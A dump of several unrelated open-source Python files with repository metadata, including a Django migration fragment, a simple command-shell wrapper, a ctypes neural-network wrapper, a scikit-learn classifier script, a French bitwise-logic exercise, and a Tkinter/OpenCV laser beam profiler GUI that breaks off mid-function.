('language', models.CharField(choices=[(Language('arabic'), 'arabic'), (Language('persian'), 'persian'), (Language('english'), 'english')], max_length=640, verbose_name='Sprache')),
('text', models.CharField(max_length=640, verbose_name='Text รbersetzung')),
],
options={
'verbose_name': 'Meldungs-รbersetzung',
'verbose_name_plural': 'Meldungs-รbersetzung',
'ordering': ('id',),
},
),
migrations.AddField(
model_name='report',
name='german',
field=models.BooleanField(blank=True, default=False, verbose_name='Deutsch'),
),
migrations.AddField(
model_name='reporttranslation',
name='report',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='translations', related_query_name='translation', to='cms.Report'),
),
]
| [
"[email protected]"
] | |
aaa1540d356a3b522b1acfaeb7f18be71bbefcdf | 7c96ece477ef41d7108cf818a530c56e1cfc4b6d | /funcshell/utils.py | 14e38c0b956e418d8cfb3bcd2874bc86dc35cbfb | [
"MIT"
] | permissive | hien/funcshell | 3d25cd295c1c09dd0486a5fac968fda98dd64b7e | ddcaad425e44fc9a56acaf26c6496a99358d0482 | refs/heads/master | 2020-12-25T14:08:49.778448 | 2010-12-25T07:00:40 | 2010-12-25T07:00:40 | 1,808,310 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 652 | py | import cmd
class EasyShell(cmd.Cmd):
def __init__(self, callback, prompt='> '):
cmd.Cmd.__init__(self)
self.callback = callback
self.prompt = prompt
self.use_rawinput = True
def default(self, line):
if line == 'EOF':
print ''
return self.do_exit(line)
self.callback(line)
def do_exit(self, line):
return True
def do_help(self, line):
self.help_exit()
def emptyline(self):
pass
def help_exit(self):
print 'Type exit to quit the shell.'
def help_help(self):
pass
def run(self):
self.cmdloop()
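
# Minimal usage sketch (illustrative only; `echo` is a hypothetical callback,
# not part of this module):
if __name__ == '__main__':
    def echo(line):
        print 'you typed: %s' % line
    EasyShell(echo, prompt='demo> ').run()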
| [
"[email protected]"
] | |
78f177a75a2e1238ecb60c88659a2e09df68f922 | 83129b26063ddbf0fd0bbabd929659499ad59eb9 | /ann.py | 4851ff7e3046bb20e8511a8b7bc955e56a516c25 | [] | no_license | baxton-sg/test | ae5d09412c3d4f62b36cd616541ad0c0c09622e0 | ae09b1858c468a0d81c91da0c69028a5ced89d3d | refs/heads/master | 2021-01-01T16:30:22.464937 | 2016-02-04T09:01:08 | 2016-02-04T09:01:08 | 38,250,505 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,680 | py |
import os
import sys
import numpy as np
import scipy as sp
from sklearn.ensemble import RandomForestClassifier
import matplotlib.pyplot as plt
import ctypes
#import ann_py
#ANN_DLL = ctypes.cdll.LoadLibrary(r"/home/maxim/kaggle/ann/libann.so")
ANN_DLL = ctypes.cdll.LoadLibrary(r"c:\\temp\\test_python\\ann\\ann2.dll")
class ANN(object):
def __init__(self, sizes):
self.ss = np.array(sizes, dtype=np.int32)
self.ann = ANN_DLL.ann_create(self.ss.ctypes.data, ctypes.c_int(self.ss.shape[0]))
self.alpha = ctypes.c_double(.0001)
self.cost = ctypes.c_double(0.)
def partial_fit(self, X, Y, dummy, out_params=None):
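        # The DLL reads raw buffers via ndarray.ctypes.data, so X and Y are
        # expected to be C-contiguous float64 arrays; R tells the native side
        # how many samples (rows) the buffer holds.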
R = X.shape[0] if len(X.shape) == 2 else 1
ANN_DLL.ann_fit(ctypes.c_void_p(self.ann), X.ctypes.data, Y.ctypes.data, ctypes.c_int(R), ctypes.addressof(self.alpha), ctypes.c_double(16), ctypes.c_int(1), ctypes.addressof(self.cost))
        if out_params is not None:
            out_params.append(self.alpha.value)
            out_params.append(self.cost.value)  # unwrap the ctypes double, matching alpha above
def predict_proba(self, X):
        if isinstance(X, list):
X = np.array(X, dtype=np.float64)
R = X.shape[0] if len(X.shape) == 2 else 1
C = self.ss[-1]
predictions = np.array([0] * R * C, dtype=np.float64)
ANN_DLL.ann_predict(ctypes.c_void_p(self.ann), X.ctypes.data, predictions.ctypes.data, ctypes.c_int(R))
predictions = predictions.reshape((R, C))
if C == 1:
res = np.zeros((R, 2), dtype=np.float64)
for i,v in enumerate(predictions):
res[i,0] = 1. - v[0]
res[i,1] = v[0]
return res
return predictions
| [
"[email protected]"
] | |
9a4b038c518a883a5160c78780c32010eb158b30 | 6b31e416b23ffba2e2269588d767783d1806190c | /classifier.py | c8c953a66afe03ea0a4bfdf20cc4cc40e8e81485 | [] | no_license | fatemehYP/Decision_support_system | 6decea4fc9e4c9cd041376eb25c961ef6ab90292 | 40ef3d2f4bdd90fd91e331542fb9cd8a70b3a398 | refs/heads/master | 2023-03-04T19:46:34.866756 | 2021-02-18T14:44:18 | 2021-02-18T14:44:18 | 335,388,144 | 0 | 1 | null | 2021-02-18T14:44:19 | 2021-02-02T18:39:14 | Python | UTF-8 | Python | false | false | 1,489 | py | from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.multiclass import OneVsRestClassifier
from sklearn.cluster import KMeans
from sklearn.metrics import classification_report, confusion_matrix
import numpy as np
from matplotlib import style
import matplotlib.pyplot as plt
import pandas as pd
import ipdb
class_weight = {0: 0.2, 1: 0.2, 2: 0.6, 3: 0.4, 4: 0.2, 5: 0.45, 6: 0.4, 7: 0.25, 8: 0.7, 9: 1,
10: 0.8, 11: 0.6}
# read dataset
df = pd.read_excel("Emergency_casebase.xls")
X = np.array(df.astype(float))
df_label = pd.read_excel("classes.xls")
y = np.array(df_label).ravel()  # flatten to the 1-D label vector sklearn expects
model = LogisticRegression(solver='liblinear', multi_class='ovr', random_state=0).fit(X, y)
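# With multi_class='ovr', one binary logistic regression is trained per class
# and prediction picks the class whose classifier scores highest.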
input2 = np.array([[1, 0, 15, 1, 1, 0, 0, 0],
[0, 0, 62, 1, 0, 1, 0, 1],
[0, 2, 62, 1, 1, 0, 0, 0],
[1, 0, 62, 1, 3, 1, 0, 0],
[2, 0, 100, 0, 5, 0, 1, 1],
[3, 0, 225, 1, 1, 1, 0, 1],
[0, 2, 15, 1, 1, 0, 0, 0],
[0, 1, 30.5, 1, 3, 1, 2, 1],
[0, 1, 15, 1, 5, 1, 0, 1],
[1, 1, 50, 1, 5, 1, 0, 1],
[1, 1, 50, 1, 5, 1, 0, 1],
[1, 0, 27, 1, 1, 0, 1, 0]])
y_predict = model.predict(input2)
print(model.score(input2, y))
ipdb.set_trace()
# count = 0
# for i in range(12):
# count += model.predict_proba(input2)[11][i]
# print(count)
| [
"[email protected]"
] | |
cbc4a539ea136c64e60d55784fbf7e3e82802e68 | 0418e5bed489056a6c39e08aa6346dbd4ded52ea | /ARCHIVES/sujet_etude_1_operations_binaires_correction.py | 08a19f25122f949f597d7b741bced96a0dd5fa5e | [
"CC-BY-4.0"
] | permissive | michaelguedj/ens__prog_sci_python | a14110e6357c3b14025744beb61c78db4f661f51 | bb4c323ee90e94d15cbb21898ca7591f5fc28bbd | refs/heads/master | 2022-05-14T02:57:51.723191 | 2022-05-09T08:03:13 | 2022-05-09T08:03:13 | 220,700,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | # coding: utf-8
import math
# Binary operations
# Functions
""" Implement the not() function: it takes one bit as argument and
returns its negation. """
def non(b):
if b == 0:
return 1
if b == 1:
return 0
""" Rรฉalisez la fonction or() qui prend en argument deux bits et
retourne leur disjonction. """
def ou(b1, b2):
if b1 == 1:
return 1
if b2 == 1:
return 1
    # otherwise b1=0 and b2=0
return 0
""" Rรฉalisez la fonction and() qui prend en argument deux bits et
retourne leur conjonction. """
def et(b1, b2):
if b1 == 0:
return 0
if b2 == 0:
return 0
    # otherwise b1=1 and b2=1
return 1
# Bit-by-bit operations on bytes
# Data structure
""" Choose the data structure needed to store
one byte (8 bits). """
o1 = [1,0,0,1,1,1,1,0]
o2 = [1,1,1,1,0,0,0,0]
# Functions
""" Implement the not_octet() function: it takes one
byte and returns its bit-by-bit negation. """
def non_oct(o):
res = [0]*8
for i in range(8):
res[i] = non(o[i])
return res
""" Rรฉalisez la fonction or_octet() qui prend en argument deux
octets et retourne leur disjonction bit ร bit. """
def ou_oct(o1, o2):
res = [0]*8
for i in range(8):
res[i] = ou(o1[i], o2[i])
return res
""" Rรฉalisez la fonction and_octet() qui prend en argument deux
octets et retourne leur conjonction bit ร bit. """
def et_oct(o1, o2):
res = [0]*8
for i in range(8):
res[i] = et(o1[i], o2[i])
return res
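# Sanity check (a sketch, not part of the original exercise): De Morgan's law,
# non(a AND b) == (non a) OR (non b), should hold bit-by-bit on bytes.
assert non_oct(et_oct(o1, o2)) == ou_oct(non_oct(o1), non_oct(o2))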
# Test
print(o1)
print(non_oct(o1))
print("")
print(o1)
print(o2)
print(ou_oct(o1,o2))
print("")
print(o1)
print(o2)
print(et_oct(o1,o2))
| [
"[email protected]"
] | |
e606513f2ccc7192a823d3fe94ad4e3c38c0ee03 | 82fac45e29297da3431bcc0c5732b8341daf700a | /python_software/Beamprofiler_Autocorrelator_v0.9.py | 6120f7586e74b398897ffd28174a14b45225a358 | [] | no_license | kgfrog/beamprofiler | a9584fd49920e0836656b82c375d7acc9ff9bd7d | bd66509431e4e66de9fbd76f4367bf1ce932d092 | refs/heads/master | 2022-11-26T08:05:41.948663 | 2020-07-25T07:45:01 | 2020-07-25T07:45:01 | 250,818,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,824 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 15 09:10:12 2019
@author: frog
"""
import tkinter as tk
import tkinter.ttk as ttk
import tkinter.filedialog as tkfd
#import tkinter.messagebox as tkmsg
#import os
#import glob
import cv2
#import sys
import matplotlib.pyplot as plt
import numpy as np
#import math
import pandas as pd
#import csv
#from scipy.linalg import solve
#import sympy as sym
import scipy.optimize
#from natsort import natsorted
#from picamera.array import PiRGBArray
#from picamera import PiCamera
import time
from PIL import Image, ImageTk
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import platform
if platform.system() == "Windows":
try:
from instrumental.drivers.cameras import uc480
except:
pass
from win32api import GetSystemMetrics
screenwidth = GetSystemMetrics(0)
screenheight = GetSystemMetrics(1)
#elif platform.system() == Darwin:
class CV2:
    def beam_normalize(img_data): # normalize the image to the [0, 1] range
GUI.dark_offset()
if dark == 21:
img_data = abs(img_data-dark_data)
imgmin = np.min(img_data)
data0 = img_data-imgmin
imgmax = np.max(data0)
ndata = data0/imgmax
return ndata
    def beam_row_columns(img_data, ndata): # row/column profiles through the intensity peak
global numrow, numcolumn
minVal, maxVal, minLoc, maxLoc = cv2.minMaxLoc(img_data)
numrow = maxLoc[1]
numcolumn = maxLoc[0]
datarow = ndata[numrow,:]
datacolumn = ndata[:,numcolumn]
dr = pd.Series(datarow)
dc = pd.Series(datacolumn)
return dr, dc
def tracking(data):
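        # If a slider checkbox is ticked, override the auto-detected peak
        # row/column with the slider position, then draw crosshair lines on a
        # copy of the normalized image.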
global numrow,numcolumn
trackingimg = np.copy(data)
if varv.get() == True:
numrow = int(cam_res_h-1-verticalslider.get())
if varh.get() == True:
numcolumn = int(horizontalslider.get())
datarow = data[numrow,:]
datacolumn = data[:,numcolumn]
dr = pd.Series(datarow)
dc = pd.Series(datacolumn)
#trackingimg[numrow,:] = 0
#trackingimg[:,numcolumn] = 0
trackingimg = cv2.line(trackingimg,(0,numrow),(len(datarow)-1,numrow),color=0,thickness=2)
trackingimg = cv2.line(trackingimg,(numcolumn,0),(numcolumn,len(datacolumn)-1),color=0,thickness=2)
return trackingimg, dr, dc
    def beam_peak(data): # peak position extraction
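        # Take the two samples closest to the normalized maximum (1.0) and use
        # the midpoint of their indices as the peak position, which softens
        # single-pixel noise at the top of the profile.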
data_peak = data.iloc[data.sub(1).abs().argsort()[:2]]
data_index = list(data_peak.index)
data_peak = (data_index[0]-data_index[1])/2+data_index[1]
data_peak = round(data_peak)
return data_peak
    def beam_intensity(dr, dc, dr_peak, dc_peak): # intensity profiles re-indexed about the peak
dr_res = []
dc_res = []
dr_peak = np.array(dr_peak, dtype="int64")
dc_peak = np.array(dc_peak, dtype="int64")
for i in range(-dr_peak+2,cam_res_w-dr_peak+2):
dr_res.append(i)
for j in range(-dc_peak+2,cam_res_h-dc_peak+2):
dc_res.append(j)
dr_data = pd.DataFrame({"row_num" : dr_res, "intensity" : dr})
dr_data = dr_data.set_index("row_num",drop=True)
dc_data = pd.DataFrame({"col_num" : dc_res, "intensity" : dc})
dc_data = dc_data.set_index("col_num",drop=True)
return dr_data, dc_data
    def beam_size(linedata, linedata_peak, percent_of_intensity): # beam size in pixels at a given intensity fraction
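        # Split the profile at the peak and find, on each side, the sample
        # closest to the requested fraction of the maximum (0.5 for FWHM,
        # 1/e^2 ~ 0.135 for the Gaussian convention); the width is the index
        # distance between the two crossings.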
linedata_cut_0 = linedata[0:linedata_peak-1]
linedata_cut_1 = linedata[linedata_peak-1:len(linedata)]
linedata_size_0 = linedata_cut_0.iloc[linedata_cut_0.sub(percent_of_intensity).abs().argsort()[:1]]
linedata_size_1 = linedata_cut_1.iloc[linedata_cut_1.sub(percent_of_intensity).abs().argsort()[:1]]
linedata_size_index_0 = list(linedata_size_0.index)
linedata_size_index_1 = list(linedata_size_1.index)
linedata_size = linedata_size_index_1[0] - linedata_size_index_0[0]
return linedata_size
def from_pixel_to_beam_width(pixel_width, unit):
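        # The constants below are the sensor pixel pitches in micrometres
        # (3.6 um and 5.2 um for the two uc480 cameras, 1.4 um for the "test"
        # camera), used to convert a width in pixels into mm or um.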
if "C1284R13C" in cam_name:
if "mm" in unit:
beam_width = 3.6*10**(-3)*pixel_width
elif "um" in unit:
beam_width = 3.6*pixel_width
elif "C1285R12M" in cam_name:
if "mm" in unit:
beam_width = 5.2*10**(-3)*pixel_width
elif "um" in unit:
beam_width = 5.2*pixel_width
elif "test" in cam_name:
if "mm" in unit:
beam_width = 1.4*10**(-3)*pixel_width
elif "um" in unit:
beam_width = 1.4*pixel_width
else:
beam_width = pixel_width
beam_width = round(beam_width, 3)
return beam_width
def pixel_to_realsize(pixel_data, unit):
realsize = []
for i in pixel_data.index.values:
realsize_data = CV2.from_pixel_to_beam_width(i, unit)
realsize.append(realsize_data)
return realsize
def fitting(data):
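        # NOTE: legacy least-squares fit of log-intensity to a parabola; it
        # references sympy as `sym`, whose import is commented out above, so
        # calling this as-is raises NameError. GUI.scipy_fit is used instead.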
n = len(data)
a11 = n
a12 = data.index.values.sum()
a13 = data.index.values.sum()**2
a21 = data.index.values.sum()
a22 = data.index.values.sum()**2
a23 = data.index.values.sum()**3
a31 = data.index.values.sum()**2
a32 = data.index.values.sum()**3
a33 = data.index.values.sum()**4
b11 = np.sum(np.log(data.values+1))
b12 = np.sum(data.index.values*np.log(data.values+1).T)
b13 = np.sum(data.index.values**2*np.log(data.values+1).T)
#A = np.array([[a11,a12,a13],[a21,a22,a23],[a31,a32,a33]])
#B = np.array([b11,b12,b13])
#X= solve(A,B)
#Ainv = np.linalg.inv(A)
#X = np.dot(Ainv,B)
#X = np.linalg.solve(A,B)
a,b,c = sym.symbols("a b c")
eqn1 = a11*a + a12*b + a13*c - b11
eqn2 = a21*a + a22*b + a23*c - b12
eqn3 = a31*a + a32*b + a33*c - b13
#X = solve()
X = sym.solve([eqn1,eqn2,eqn3])
#print(X)
return X
def sigmoid(x, gain=1, offset_x=0):
return (255*(np.tanh(((1/100*x+offset_x)*gain)/2)+1)/2)
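    # color_R/G/B map an 8-bit intensity onto a smooth false-color scale built
    # from tanh segments (a jet-like colormap); beam_color applies them through
    # cv2.LUT to produce BGR and RGB renderings of the beam image.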
def color_R(x):
if x >= 80:
red = 255*(np.tanh(1/20*((x-35)*2-255)/2)+1)/2
elif 30 < x < 80:
red = -100*(np.tanh(1/5*((x+70)*2-255)/2)+1)/2+100
elif x <= 30 :
red = 100*(np.tanh(1/5*((x+110)*2-255)/2)+1)/2
return red
def color_G(x):
if x < 148:
green = 255*(np.tanh(1/20*((x+30)*2-255)/2)+1)/2
elif 148 <= x < 220:
green = -255*(np.tanh(1/20*((x-70)*2-255)/2)+1)/2+255
elif x >= 220:
green = 225*(np.tanh(1/5*((x-107)*2-255)/2)+1)/2+30
return green
def color_B(x):
if 200 > x > 45:
blue = -255*(np.tanh(1/20*((x-5)*2-255)/2)+1)/2+255
elif 45 >= x:
blue = 255*(np.tanh(1/10*((x+105)*2-255)/2)+1)/2
elif x >= 200:
blue = 255*(np.tanh(1/5*((x-90)*2-255)/2)+1)/2
return blue
def beam_color(img):
#color_data = [color_RGB(x*1/256) for x in range(0,256)]
#color_data = np.array(color_data)
#color_data = color_data*255
#color_data = np.array(color_data, dtype="uint8")
#color_data_list = list(color_data)
#color_data = list(color_data)
#look_up_table_color = np.ones((256, 1), dtype = 'uint8' ) * 0
#for i in range(256):
#img_r = np.empty((1,256), np.uint8)
lut_r = np.ones((256, 1), dtype = 'uint8' ) * 0
lut_g = np.ones((256, 1), dtype = 'uint8' ) * 0
lut_b = np.ones((256, 1), dtype = 'uint8' ) * 0
for i in range(256):
lut_r[i][0] = CV2.color_R(i)
lut_g[i][0] = CV2.color_G(i)
lut_b[i][0] = CV2.color_B(i)
img_r = cv2.LUT(img, lut_r)
img_g = cv2.LUT(img, lut_g)
img_b = cv2.LUT(img, lut_b)
img_bgr = cv2.merge((img_b, img_g, img_r))
img_rgb = cv2.merge((img_r, img_g, img_b))
return img_bgr, img_rgb
def pause_plot(xdata, ydata):
fig, ax = plt.subplots(1, 1)
x = xdata
y = ydata
lines = ax.plot(x, y)
return lines
    def knife_edge(img, axis, from_, to_, unit): # axis: 0 for X, 1 for Y
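        # Software knife-edge: integrate the image along one axis, build the
        # cumulative normalized power curve, and report the distance between
        # its crossings of `from_` and `to_` (e.g. 10%/90%) in real units.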
img_sum = np.sum(img)
img_line_sum = np.sum(img, axis=axis)
line_sum = []
line_value = []
for i in np.arange(0, len(img_line_sum), 1):
line_value = np.append(line_value, img_line_sum[i])
line_sum = np.append(line_sum, np.sum(line_value))
knifeedge_data = line_sum/img_sum
knifeedge_data = pd.Series(knifeedge_data)
knifeedge_size_0 = knifeedge_data.iloc[knifeedge_data.sub(from_).abs().argsort()[:1]]
knifeedge_size_1 = knifeedge_data.iloc[knifeedge_data.sub(to_).abs().argsort()[:1]]
#knifeedge_size_index = list(knifeedge_size_0.index)
knifeedge_size = np.array(knifeedge_size_1.index) - np.array(knifeedge_size_0.index)
knifeedge_size_actual = CV2.from_pixel_to_beam_width(int(knifeedge_size), unit)
return knifeedge_size_actual
#line = []
#line_list = []
#for i in np.arange(0, len(line_sum)-1, 1):
#line = line_sum[i+1] - line_sum[i]
#line_list = np.append(line_list, line)
    def beam_intensity_img(img, linedata, axis): # axis: 0 for X, 1 for Y
linedata = linedata * 255
linedata = np.array(linedata, dtype="uint8")
drawline_data = []
for i in np.arange(0, len(linedata), 1):
if axis == 0:
drawline_data = np.append(drawline_data,[i,img.shape[axis]-linedata[i]])
elif axis == 1:
drawline_data = np.append(drawline_data,[linedata[i],i])
drawline_data = np.array(drawline_data, dtype="int")
drawline_data = drawline_data.reshape(-1,1,2)
img = cv2.polylines(img, [drawline_data], False, color=255, thickness=2)
img = np.array(img, dtype="uint8")
return img
class GUI:
def setup():
global fig1,fig2
global ax1,ax2
global canvas1,canvas2
global imgcanvas,imgcap
global root,subframe
global Static2,Static3,Static4
global Static21,Static22,Static31,Static32,Static41,Static42
global Static_a11,Static_a21
global barcanvas,barimg
global fnamebox
global exposuretimebox
global verticalslider,horizontalslider
global varv,varh
global testcanvas,dxbox
global autocorrelator_
global width, height
global frame2
global func
global X_peak_position,Y_peak_position
root = tk.Tk()
root.title("BeamProfiler")
#resolution = "%sx%s" % (screenwidth, screenheight)
resolution = "1280x720"
if resolution == "1920x1080":
root.geometry("1920x1080")
width = 640
#height = 512
height = 480
elif resolution in ("1366x768", "1600x900", "1280x720"):
root.geometry("1280x720")
width = int(640/4*3)
#height = int(512/4*3)
height = int(480/4*3)
mainframe = ttk.Frame(root, height=800, width=800)
mainframe.grid(row=1, column=1, sticky="n", pady=10)
imgcanvas = tk.Canvas(mainframe, width=width, height=height)
imgcanvas.grid(row=1, column=3, sticky="n", pady=25)
imgcap = tk.Label(imgcanvas)
imgcap.grid(row=1, column=3, sticky="n", pady=25)
fig1 = Figure(figsize=(9, 3), dpi=70)
fig1.subplots_adjust(bottom=0.4)
ax1 = fig1.add_subplot(111)
ax1.set_xlabel("Beam width (px)")
ax1.set_ylabel("Intensity (arb.units)")
fig2 = Figure(figsize=(3, 7), dpi=70)
fig2.subplots_adjust(top=0.9,bottom=0.15,left=0.3)
fig2.patch.set_alpha(0)
ax2 = fig2.add_subplot(111)
#fig2.tight_layout()
ax2.set_xlabel("Beam width (px)",labelpad=None)
ax2.set_ylabel("Intensity (arb.units)",labelpad=None)
canvas1 = FigureCanvasTkAgg(fig1, master=mainframe)
canvas1.get_tk_widget().grid(column=3, row=2, sticky="n")
canvas1._tkcanvas.grid(column=3, row=2, sticky="n")
#canvas1.get_tk_widget().place(x=300, y=300)
#canvas1._tkcanvas.place(x=300, y=300)
canvas2 = FigureCanvasTkAgg(fig2, master=mainframe)
canvas2.get_tk_widget().grid(column=1, row=1, padx=20, sticky="n")
canvas2._tkcanvas.grid(column=1, row=1, padx=20, sticky="n")
#barcanvas = tk.Canvas(mainframe, width=25, height=510)
#barcanvas.grid(row=1, column=2)
#barimg = tk.Label(barcanvas)
#barimg.grid(row=1, column=2)
#get_variable = tk.IntVar()
horizontalslider = ttk.Scale(mainframe, from_=0, to=cam_res_w-1, length=510, orient="h")
horizontalslider.place(x=310, y=420)
verticalslider = ttk.Scale(mainframe, from_=cam_res_h-1, to=0, length=365, orient="v")
verticalslider.place(x=280,y=50)
subframe = ttk.Frame(root, height=600, width=500)
subframe.grid(row=1, column=4, sticky="nw")
frame1 = ttk.Frame(subframe, height=180, width=100)
frame1.grid(row=1, column=1, sticky="nw", pady=30)
frame11 = ttk.Frame(frame1, height=60, width=100)
frame11.grid(row=1, column=1, sticky="nw", pady=20)
frame12 = ttk.Frame(frame1, height=60, width=100)
frame12.grid(row=2, column=1, sticky="n", pady=10)
frame13 = ttk.Frame(frame1, height=60, width=100)
frame13.grid(row=3, column=1, sticky="nw", pady=10)
Static1 = ttk.Label(frame11, text='BeamWidth', font=("",10,"bold"))
Static1.grid(row=1, column=1 ,sticky="w", pady=0)
Static11 = ttk.Label(frame11, text='X', font=("",10,"bold"))
Static11.grid(row=1, column=2, padx=20)
Static12 = ttk.Label(frame11, text='Y', font=("",10,"bold"))
Static12.grid(row=1, column=3 ,padx=20)
Static2 = ttk.Label(frame11, text='13.5% of peak (px)', font=("",10,"bold"))
Static2.grid(row=2, column=1,sticky="w")
Static3 = ttk.Label(frame11, text='50.0% of peak (px)', font=("",10,"bold"))
Static3.grid(row=3, column=1,sticky="w")
Static4 = ttk.Label(frame11, text='Peak position (px)', font=("",10,"bold"))
Static4.grid(row=4, column=1,sticky="w")
#Static4 = ttk.Label(frame11, text='knife edge 10/90 (mm)', font=("",10,"bold"))
#Static4.grid(row=4, column=1)
#Static5 = ttk.Label(frame11, text='knife edge 20/80 (mm)', font=("",10,"bold"))
#Static5.grid(row=5, column=1)
X_size_e2, Y_size_e2 = 0,0
X_size_FWHM, Y_size_FWHM = 0,0
X_peak_position, Y_peak_position = 0,0
#X_knife_edge_10_90, Y_knife_edge_10_90 = 0,0
#X_knife_edge_20_80, Y_knife_edge_20_80 = 0,0
style = ttk.Style()
style.configure("style.TButton", font=("",10,"bold"))
Static21 = ttk.Label(frame11, text=X_size_e2, font=("",10,"bold"))
Static21.grid(row=2, column=2)
Static22 = ttk.Label(frame11, text=Y_size_e2, font=("",10,"bold"))
Static22.grid(row=2, column=3)
Static31 = ttk.Label(frame11, text=X_size_FWHM, font=("",10,"bold"))
Static31.grid(row=3, column=2)
Static32 = ttk.Label(frame11, text=Y_size_FWHM, font=("",10,"bold"))
Static32.grid(row=3, column=3)
Static41 = ttk.Label(frame11, text=X_peak_position, font=("",10,"bold"))
Static41.grid(row=4, column=2)
Static42 = ttk.Label(frame11, text=Y_peak_position, font=("",10,"bold"))
Static42.grid(row=4, column=3)
#Static41 = ttk.Label(frame11, text=X_knife_edge_10_90, font=("",10,"bold"))
#Static41.grid(row=4, column=2)
#Static42 = ttk.Label(frame11, text=Y_knife_edge_10_90, font=("",10,"bold"))
#Static42.grid(row=4, column=3)
#Static51 = ttk.Label(frame11, text=X_knife_edge_20_80, font=("",10,"bold"))
#Static51.grid(row=5, column=2)
#Static52 = ttk.Label(frame11, text=Y_knife_edge_20_80, font=("",10,"bold"))
#Static52.grid(row=5, column=3)
folderbutton = ttk.Button(frame12, text="Save as", command=GUI_menu.savefile, style="style.TButton")
folderbutton.grid(row=3, column=3)
fnamebox = ttk.Entry(frame12, width=40)
fnamebox.grid(row=3, column=1, columnspan=2)
#darkbutton = ttk.Button(frame12, text="Offset", command=GUI.dark, style="style.TButton")
#darkbutton.grid(row=2, column=3)
#exposuretimelabel = ttk.Label(frame12, text="Exposuretime (ms)", font=("",10,"bold"))
#exposuretimelabel.grid(row=1, column=1, sticky="w")
#exposuretimebox = ttk.Spinbox(frame12, from_=0.1, to=100, increment=0.1)
#exposuretimebox.grid(row=2, column=1, pady=10, sticky="w")
#exposuretimebutton = ttk.Button(frame12, text="Set", command=GUI.exposure_time, style="style.TButton")
#exposuretimebutton.grid(row=2, column=2, pady=10, sticky="w")
#trackingbutton = ttk.Button(frame13, text="Tracking", command=GUI.tracking_button, style="style.TButton")
#trackingbutton.grid(row=1, column=2, rowspan=2, padx=20)
if "C1284R13C" in cam_name or "C1285R12M" in cam_name:
triggerbutton = ttk.Button(frame13, text="Trigger", command=GUI.trigger, style="style.TButton")
triggerbutton.grid(row=1, column=3, rowspan=2, padx=20)
#style.configure("style.TCheckbutton", font=("",10,"bold"))
#varv = tk.BooleanVar()
#verticalsliderbutton = ttk.Checkbutton(frame13, text="Horizontal slider", variable=varv, command=GUI.vsliderbutton, style="style.TCheckbutton")
#verticalsliderbutton.grid(row=2, column=1, sticky="w")
#varh = tk.BooleanVar()
#horizontalsliderbutton = ttk.Checkbutton(frame13, text="Vertical slider", variable=varh, command=GUI.hsliderbutton, style="style.TCheckbutton")
#horizontalsliderbutton.grid(row=1, column=1, sticky="w")
#testcanvas = ttk.Notebook(root, width=730, height=1000)
#testcanvas.grid(row=1, column=4, rowspan=3)
frame2 = ttk.Frame(subframe, height=800, width=300)
frame2.grid(row=2, column=1, sticky="nw")
frame21 = ttk.Frame(frame2, height=60, width=300)
frame21.grid(row=1, column=1, sticky="nw", pady=10)
startbutton = ttk.Button(frame21, text="Base", command=GUI.calculate, style="style.TButton")
startbutton.grid(row=1, column=1, padx=10, sticky="nw")
dxbox = ttk.Entry(frame21, width=10)
dxbox.grid(row=1, column=2, sticky="n")
dxlabel = ttk.Label(frame21, text="mm", font=("",10,"bold"))
dxlabel.grid(row=1, column=3, sticky="n")
dxbutton = ttk.Button(frame21, text="Second", command=GUI.autocorrelator, style="style.TButton")
dxbutton.grid(row=1, column=4, padx=10, sticky="n")
acsavebutton = ttk.Button(frame21, text="Save", command=GUI_menu.acsavefile, style="style.TButton")
acsavebutton.grid(row=1, column=5, padx=10, sticky="n")
FWHM_t = 0
#pix2 = 0
autocorrelator_ = 0
func = "gaussian"
frame3 = ttk.Frame(subframe, height=180, width=300)
frame3.grid(row=1, column=2, sticky="nw", pady=10)
Static_a11 = ttk.Label(frame3, text="%s fs" % FWHM_t, font=("",80,"bold"))
Static_a11.grid(row=1, column=1, sticky="nw", padx=10)
#Static_a21 = ttk.Label(frame3, text=pix2)
#Static_a21.place(x=1300, y=500)
def cam_setup():
global cap,cam,cam_name
global frame
global exposuretime
try:
cam = uc480.UC480_Camera()
except:
pass
cam_name = cam.model
cam_name = str(cam_name)
cam.start_capture()
#frame = cam.grab_image(timeout='None', copy=True,width=640,height=480)
exposuretime = "0.2ms"
frame = cam.start_live_video(framerate=None, exposure_time=exposuretime)
#frame = cam.get_captured_image(timeout='10s', copy=True)
#camera_id = 1
#cap = cv2.VideoCapture(camera_id)
#cap.set(cv2.CAP_PROP_AUTO_EXPOSURE, 0.25)
#cap.set(cv2.CAP_PROP_EXPOSURE, shutterspeed)
#cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
#cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
time.sleep(1)
def cam_setup_test(camera_id):
global cam, cam_name, cam_res
global cam_res_w, cam_res_h
global exposuretime
cam = cv2.VideoCapture(camera_id)
cam_res = "1024x768"
cam_res = cam_res.split("x")
cam_res_w = int(cam_res[0])
cam_res_h = int(cam_res[1])
#cam_res_w = 1024
#cam_res_h = 768
#cam.set(cv2.CAP_PROP_AUTO_EXPOSURE, -1)
exposuretime = -5
cam.set(cv2.CAP_PROP_EXPOSURE, exposuretime)
#print(cam.get(cv2.CAP_PROP_EXPOSURE))
#cam_res_w = cam.get(cv2.CAP_PROP_FRAME_WIDTH)
#cam_res_h = cam.get(cv2.CAP_PROP_FRAME_HEIGHT)
#print(cam_res_w, cam_res_h)
cam.set(cv2.CAP_PROP_FRAME_WIDTH, cam_res_w)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, cam_res_h)
ret, frame = cam.read()
frame = cv2.flip(frame, 1)
cam_name = "test"
time.sleep(1)
def cam_select():
cam_list = []
for i in np.arange(0, 6, 1):
            cam = cv2.VideoCapture(i)
            if cam.isOpened() == True:
                cam_list.append(i)
            cam.release()  # release the probe handle so the device is not left open
        return cam_list
def beamprofiler_img():
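        # Per-frame pipeline: grab a frame, normalize it, take the X/Y
        # profiles through the peak (or the slider-selected lines), overlay
        # the profiles, false-color the result, and reschedule itself every
        # 100 ms via Tk's after().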
global frame,img,img_norm
global X,Y
